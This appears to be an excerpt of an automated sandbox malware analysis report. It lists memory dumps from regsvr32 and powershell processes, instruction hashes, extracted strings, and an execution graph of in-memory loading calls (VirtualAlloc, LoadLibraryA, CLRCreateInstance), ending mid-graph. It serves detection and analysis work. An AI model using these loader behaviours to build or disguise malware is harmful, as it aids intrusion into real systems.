                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: 02a32bd9e5bd703d9d81bbc9e1081ff0bcfc2c7a96c5fc1522926c3345ab09d2
                                                                              • Instruction ID: 3ac0720221a60a724f19d287849d8e7c8e66118ee9b3fa9cc9ba337640e7a334
                                                                              • Opcode Fuzzy Hash: 02a32bd9e5bd703d9d81bbc9e1081ff0bcfc2c7a96c5fc1522926c3345ab09d2
                                                                              • Instruction Fuzzy Hash: A331D521F0851241FE955B1595F13B922906F8AB80F584479DF0EC77D9DE3CE842A360
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              • Opcode ID: 2913355c43498a83f00c497009b094d8208e2943772555b1345e20e73e6a951c
                                                                              • Instruction ID: f2196e7881d39edf7aa2f526f814a51773629ea086042199d5ea5e8679916d12
                                                                              • Opcode Fuzzy Hash: 2913355c43498a83f00c497009b094d8208e2943772555b1345e20e73e6a951c
                                                                              • Instruction Fuzzy Hash: 7F21F522F0865202FA956F1585F137D5691AF8BB90F5C4479DF4DC77CADE6CE840A320
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93cc8f335ea77d20812d5ea9461f9ac6aec4459bd542a99c5557b74203656af1
                                                                              • Instruction ID: 1d37947085c0d4154f38aba437763462b541bbafcecdac9b8bd6ecb43b8c0f78
                                                                              • Opcode Fuzzy Hash: 93cc8f335ea77d20812d5ea9461f9ac6aec4459bd542a99c5557b74203656af1
                                                                              • Instruction Fuzzy Hash: 89E14572E2DAD94FE356A7A898A5174BBE1EF46214B0901FFD09DC71D3DD18AC02C362
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /
                                                                              • API String ID: 0-2043925204
                                                                              • Opcode ID: 96247af310dd38d54ca406f1a26fffcbe86576cb68099602d5c7d62887cf3c60
                                                                              • Instruction ID: 4c19f6004a5009295167b468e973e15a98afec1ce011c85ffe48ce694af0de7f
                                                                              • Opcode Fuzzy Hash: 96247af310dd38d54ca406f1a26fffcbe86576cb68099602d5c7d62887cf3c60
                                                                              • Instruction Fuzzy Hash: 9D121472E1EADD0FE756A7A888A51B5BFE1EF56218B0801FBD05CC71D3DA18AC05C361
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.973730175.00007FFCF436D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF436D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf436d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 946cb246357141a526ac434e353c5cf4bc440be6e80d338dc5fb3e9f95a162e4
                                                                              • Instruction ID: ba71097faeea852985d8d3980840a918b936a1989f78177ae80c565ce22f0778
                                                                              • Opcode Fuzzy Hash: 946cb246357141a526ac434e353c5cf4bc440be6e80d338dc5fb3e9f95a162e4
                                                                              • Instruction Fuzzy Hash: F141277140DBC84FE7568B28D8969623FB0EF93224B1505DFD089CB1A7D625A80AC7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e50d1f1171438be1899588ea3d0314a26730022a7f177205d5948f215205fdb8
                                                                              • Instruction ID: 0558126f2bf10797729a6d017572ac81b096d99011d53ef10e36be2fa04eca77
                                                                              • Opcode Fuzzy Hash: e50d1f1171438be1899588ea3d0314a26730022a7f177205d5948f215205fdb8
                                                                              • Instruction Fuzzy Hash: 3F31287191CB4C8FDB08EF5CD8466E97BE0FB55311F04426FE449D3252CA206856CBC2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6ca4f94c7fe744662c3299119e1a13acc3d0bf2c2019a3403f8997adf6d7b70
                                                                              • Instruction ID: 8dd507f2e2cc8709750b1656c6518f1fd17d4c397b50eb1b5cf8d015d52a3923
                                                                              • Opcode Fuzzy Hash: d6ca4f94c7fe744662c3299119e1a13acc3d0bf2c2019a3403f8997adf6d7b70
                                                                              • Instruction Fuzzy Hash: 0E311432E2DA2D0FE7A4A29894F1274B3D1EF44314B5901BED42EC72D2DE19EC01C6A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ad3cee754a812d5943ffaff087099766cd3e0166c32cd3854eef52dee7b466b9
                                                                              • Instruction ID: 1c462c96b3cea4532eee0842fd84d429bdb98e6b6c61e58b7aef80b5d8cf456b
                                                                              • Opcode Fuzzy Hash: ad3cee754a812d5943ffaff087099766cd3e0166c32cd3854eef52dee7b466b9
                                                                              • Instruction Fuzzy Hash: 9E21D43190CA0C8FDB58DF9CD84A7E97BE0EB95321F00812FD049D3155D670A456CB91
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3b763c228beca1a8892c0434ebaee1deb5c2f14d4ec4c5adcc78909afdb2e629
                                                                              • Instruction ID: abb1469e1d6cb564f7676506944eab289d0e7250fbfaa632540c549653b6128b
                                                                              • Opcode Fuzzy Hash: 3b763c228beca1a8892c0434ebaee1deb5c2f14d4ec4c5adcc78909afdb2e629
                                                                              • Instruction Fuzzy Hash: 5A112572E2E96D4FE7A9EA98D4A16B4A7E1EF4432470800F6E46DC74D3D908EC04C371
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0084200ad5dfc0514c9508e6661f314651b77e6dacee2883985d74b03d3c82f7
                                                                              • Instruction ID: 435f62c41692f6ef63476d6ed7c3a0cc16b842206ea4990033ac61aab6363bf3
                                                                              • Opcode Fuzzy Hash: 0084200ad5dfc0514c9508e6661f314651b77e6dacee2883985d74b03d3c82f7
                                                                              • Instruction Fuzzy Hash: 2801677121CB0C4FD744EF0CE451AA5B7E0FB95324F10066DE59AC3695D736E892CB45
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f3101a1244987c3f08fb529b2c5283d4ffa88c8e3cb6d8ea4f84e61c76d5f92a
                                                                              • Instruction ID: f3c0d7d76a8651854d7c29746144b52f002c13413f0abbd5b70767dc49267d17
                                                                              • Opcode Fuzzy Hash: f3101a1244987c3f08fb529b2c5283d4ffa88c8e3cb6d8ea4f84e61c76d5f92a
                                                                              • Instruction Fuzzy Hash: 04F02B3580C6CD8FDB05DF2488565D57FA0FF56215F0402D7E458C70A2DB649864CBE2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /`/
                                                                              • API String ID: 0-3596768853
                                                                              • Opcode ID: 961c017abff879a8cc47a97f8a5b9107208d14c4394aa2dbe0b2e9ae6383f944
                                                                              • Instruction ID: eecbcfd37ea784002e9a5d75315bbcd201abc0ed81df5a32a57bfafaf11d2e8c
                                                                              • Opcode Fuzzy Hash: 961c017abff879a8cc47a97f8a5b9107208d14c4394aa2dbe0b2e9ae6383f944
                                                                              • Instruction Fuzzy Hash: 08823A32E4DAD90FE756A72898B51B4BFE1DF53210B0801FBD499CB0E7D918AC46D361
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e26f58428c96390e4aa493661441ee2b2a26111739fcb10bd357e666e059eac7
                                                                              • Instruction ID: 230af7951a94f369d4448b702c68d2587dd67fe914d415df81946f9b42e8cccd
                                                                              • Opcode Fuzzy Hash: e26f58428c96390e4aa493661441ee2b2a26111739fcb10bd357e666e059eac7
                                                                              • Instruction Fuzzy Hash: 6B115E2180E7C94FD7079B348CA54957FB0EE13200B0902DBD498DB0E3D619981EC7B2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a9218fd711af6b4c9ba077e0513f4f6742e327f8f0d4160b198451464d82533f
                                                                              • Instruction ID: ac6b10091cb69519ec148879ec5e4ce118eb5354f967c7bfc708eb3a99a579b6
                                                                              • Opcode Fuzzy Hash: a9218fd711af6b4c9ba077e0513f4f6742e327f8f0d4160b198451464d82533f
                                                                              • Instruction Fuzzy Hash: E6514822A0EBDD4FE756A62C98B55B0BFD0DF56210B0801FFD099CB1E3D909AC45C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1157903968.00007FFCF435D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF435D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf435d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 17d6cee58277f8c6e501ddbf83341dd46fccca04a7bfe78c79c131d47807f691
                                                                              • Instruction ID: 00d632a14013fb39e28f0e3f7eca3501edfaae135e54d22c7635de0f18a9a9e3
                                                                              • Opcode Fuzzy Hash: 17d6cee58277f8c6e501ddbf83341dd46fccca04a7bfe78c79c131d47807f691
                                                                              • Instruction Fuzzy Hash: 20414A7180DBC84FE7568B28D8969623FB0EF52311B1505EFD098CB1E3D625A80AC7B2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 455eebe78243283bc0d9768ffb9ae93e265f5dac4159dfd690f1db5b4c984386
                                                                              • Instruction ID: 8c4b1baa999a84b76d990925568a1688caf194a1be1b8112a6e802bd30fdf931
                                                                              • Opcode Fuzzy Hash: 455eebe78243283bc0d9768ffb9ae93e265f5dac4159dfd690f1db5b4c984386
                                                                              • Instruction Fuzzy Hash: E831A23091CB4C9FDB58DB4CA84AAA97BE0FB98321F00422FE449D3251CB70A855CBC2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83fe1fa37596edb110af291560ab19a7c97e2c87b618fa9b45e67497670b22a0
                                                                              • Instruction ID: 03a153af6c60966ea28af93c27e66c224be7d44c79bea2d4e7ca6cec92e846d4
                                                                              • Opcode Fuzzy Hash: 83fe1fa37596edb110af291560ab19a7c97e2c87b618fa9b45e67497670b22a0
                                                                              • Instruction Fuzzy Hash: 8921073190CB4C4FDB58DBACD84A7E97BE0EB96321F04426BD048D3156DA74A456CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eeb0137010b0f0e70fb5ffdc8a044b2358affd76689cd373a49d3c67f84513db
                                                                              • Instruction ID: 928d9c789c4ef630ac6ed14e320fa0d7d21c0a01b55db5810479b0ca089d142c
                                                                              • Opcode Fuzzy Hash: eeb0137010b0f0e70fb5ffdc8a044b2358affd76689cd373a49d3c67f84513db
                                                                              • Instruction Fuzzy Hash: 5D210532E4D9AE0FEBE5E61894F4174A6C2EF4621075900BAD46ECB1EACD18EC84D721
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 84c9868c245e9965d099ea8104caf694c5afdfbdfb1d13a321a2bc1b95c95d71
                                                                              • Instruction ID: 646a5c1b2e5142aa08248c38a5781978eab19fb6adff28f1bb9c3f6f40872b1c
                                                                              • Opcode Fuzzy Hash: 84c9868c245e9965d099ea8104caf694c5afdfbdfb1d13a321a2bc1b95c95d71
                                                                              • Instruction Fuzzy Hash: 8421C87180C6DA4FDB069F649C554F57FB0EF12310B0941F6D458E70A3EA28646ACBA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2ae493225547edf0ca2475e428c74c77635d79f439c2c74d8a448f4bd4c4259
                                                                              • Instruction ID: 8a73679918d8d28a2631a0e2b115092951b5a72d1ab695a759031c40ce071233
                                                                              • Opcode Fuzzy Hash: c2ae493225547edf0ca2475e428c74c77635d79f439c2c74d8a448f4bd4c4259
                                                                              • Instruction Fuzzy Hash: 71112333E4D9A94FE7A4E618D4B05B4A6E0EF4233070900B6E42DCB0EBD908AC80D261
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                              • Instruction ID: b1a03e8b6453c95f5b7bd9d772587dd26bab7c8f1264d1f2da96ea4b7e3b30e6
                                                                              • Opcode Fuzzy Hash: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                              • Instruction Fuzzy Hash: 2C01A73021CB0C4FD748EF0CE451AA5B7E0FB95320F10062EE58AC3291D732E882CB41

                                                                              Execution Graph

                                                                              Execution Coverage:5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:33
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 99509 2f90014 99510 2f90096 99509->99510 99511 2f9006a 99509->99511 99513 2fe0a56 99511->99513 99514 2feabec 99513->99514 99518 2fe0a6e 99513->99518 99514->99510 99516 2fe0c88 99516->99510 99517 2fe0c9f LoadLibraryA 99517->99518 99518->99516 99518->99517 99519 2fe0d7c 99518->99519 99534 2fe0c9f 99519->99534 99522 2fe0c9f LoadLibraryA 99523 2fe0db2 99522->99523 99524 2fe0c9f LoadLibraryA 99523->99524 99528 2fe0dc8 99524->99528 99527 2fe0c9f LoadLibraryA 99527->99528 99528->99527 99530 2fe1358 VirtualAlloc 99528->99530 99531 2fe1daf 99528->99531 99538 2fe1dc7 99528->99538 99542 2fe5a20 99528->99542 99548 2fe32c3 LoadLibraryA 99528->99548 99549 2fe3426 LoadLibraryA 99528->99549 99550 2fe2f80 LoadLibraryA 99528->99550 99530->99528 99531->99518 99536 2fe0cd8 99534->99536 99535 2fe0d6d 99535->99522 99536->99535 99551 2fe7a09 LoadLibraryA 99536->99551 99541 2fe1df9 99538->99541 99539 2fe20ce LoadLibraryA 99539->99541 99540 2fe2208 99540->99528 99541->99539 99541->99540 99546 2fe5ae6 99542->99546 99543 2fe5fa3 SafeArrayCreate 99543->99546 99544 2fe6107 SafeArrayDestroy 99544->99546 99545 2fe5f57 CLRCreateInstance 99545->99546 99546->99543 99546->99544 99546->99545 99547 2fe6127 99546->99547 99547->99528 99548->99528 99549->99528 99550->99528 99551->99536
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
                                                                              • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                              • API String ID: 3975177916-1077193248
                                                                              • Opcode ID: 3cd8a189c29009ce87d5a1bd2db52f5fd8198f80c0cef3d0c1bf59600c9634fa
                                                                              • Instruction ID: c0d9193c338d548185e6e9524ad3a75a5092939457380aa21ebe2440b55b40d9
                                                                              • Opcode Fuzzy Hash: 3cd8a189c29009ce87d5a1bd2db52f5fd8198f80c0cef3d0c1bf59600c9634fa
                                                                              • Instruction Fuzzy Hash: BD739362B19AD184EB74CF25D8A43FA2361FB46789F44413ACF4D9BB89DF3C9641A310
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeapmemcpy$AllocAttributesErrorFileLastMutex
                                                                              • String ID: $/i:S$SYNC$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
                                                                              • API String ID: 622075969-830671369
                                                                              • Opcode ID: 9e589264a15e699423857d24033ed33c06c5e3efbc52ea30a91c4a8dcb14a9f4
                                                                              • Instruction ID: 5569a01c6f991157a02261c07891e845f63c2a2d5909f9eedb4a0aa5fd731e4e
                                                                              • Opcode Fuzzy Hash: 9e589264a15e699423857d24033ed33c06c5e3efbc52ea30a91c4a8dcb14a9f4
                                                                              • Instruction Fuzzy Hash: B1F26172B0CAC280EA759B11E4907EBA361FB86780F444136DB8C87B9ADF7DD584DB50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3979 7ffd3493eff0-7ffd3493f058 call 7ffd34992a94 3982 7ffd3493f060-7ffd3493f072 GetCurrentProcessId 3979->3982 3983 7ffd3493f074 3982->3983 3984 7ffd3493f0a8-7ffd3493f127 call 7ffd34970bf0 3982->3984 3985 7ffd3493f080-7ffd3493f0a6 ProcessPrng 3983->3985 3988 7ffd3493f13e-7ffd3493f168 3984->3988 3989 7ffd3493f129-7ffd3493f139 call 7ffd348efe90 3984->3989 3985->3984 3985->3985 3991 7ffd3493f180-7ffd3493f19b 3988->3991 3992 7ffd3493f16a-7ffd3493f170 3988->3992 3989->3988 3993 7ffd3493f255-7ffd3493f275 call 7ffd348efe80 3991->3993 3994 7ffd3493f1a0-7ffd3493f1b1 3992->3994 3995 7ffd3493f172-7ffd3493f179 3992->3995 4007 7ffd3493f6c7-7ffd3493f6cf call 7ffd3496f690 3993->4007 4008 7ffd3493f27b-7ffd3493f295 3993->4008 3997 7ffd3493f1b3-7ffd3493f1c2 3994->3997 3998 7ffd3493f1f2-7ffd3493f1fa 3994->3998 3996 7ffd3493f1fd-7ffd3493f202 3995->3996 4002 7ffd3493f204-7ffd3493f244 3996->4002 4000 7ffd3493f1c8-7ffd3493f1eb 3997->4000 4001 7ffd3493f516-7ffd3493f528 3997->4001 3998->3996 4000->3996 4004 7ffd3493f1ed 4000->4004 4001->3996 4009 7ffd3493f52e-7ffd3493f557 4001->4009 4005 7ffd3493f6c4 4002->4005 4006 7ffd3493f24a-7ffd3493f251 4002->4006 4004->4009 4005->4007 4006->3993 4014 7ffd3493f6d4-7ffd3493f6dd 4007->4014 4011 7ffd3493f2b0-7ffd3493f2b3 4008->4011 4009->4002 4012 7ffd3493f310-7ffd3493f315 4011->4012 4013 7ffd3493f2b5-7ffd3493f2b8 4011->4013 4017 7ffd3493f470-7ffd3493f4b0 call 7ffd34992a24 4012->4017 4018 7ffd3493f31b-7ffd3493f32e 4012->4018 4015 7ffd3493f2f0-7ffd3493f2f4 4013->4015 4016 7ffd3493f2ba-7ffd3493f2bc 4013->4016 4019 7ffd3493f6df 4014->4019 4020 7ffd3493f702-7ffd3493f712 4014->4020 4015->4012 4023 7ffd3493f2f6-7ffd3493f2fd 4015->4023 4022 7ffd3493f2be-7ffd3493f2c1 4016->4022 4040 7ffd3493f5d0-7ffd3493f5d3 4017->4040 4041 7ffd3493f4b6-7ffd3493f4c1 GetLastError 4017->4041 4024 7ffd3493f3a0-7ffd3493f3a5 4018->4024 4025 7ffd3493f330-7ffd3493f337 4018->4025 4026 7ffd3493f72c-7ffd3493f78f call 7ffd34993140 ReadFileEx 4019->4026 4027 7ffd3493f71f-7ffd3493f722 4020->4027 4028 7ffd3493f714-7ffd3493f71a call 7ffd348efe90 4020->4028 4032 7ffd3493f2a0-7ffd3493f2a3 4022->4032 4033 7ffd3493f2c3-7ffd3493f2ee 4022->4033 4035 7ffd3493f303-7ffd3493f30a 4023->4035 4036 7ffd3493f3da-7ffd3493f3ea 4023->4036 4029 7ffd3493f2a5-7ffd3493f2ad 4024->4029 4037 7ffd3493f33d-7ffd3493f353 4025->4037 4038 7ffd3493f6a4 4025->4038 4050 7ffd3493f7d2-7ffd3493f7e1 GetLastError 4026->4050 4051 7ffd3493f791 4026->4051 4027->4026 4030 7ffd3493f724-7ffd3493f727 CloseHandle 4027->4030 4028->4027 4029->4011 4030->4026 4032->4029 4033->4025 4035->4022 4044 7ffd3493f427-7ffd3493f430 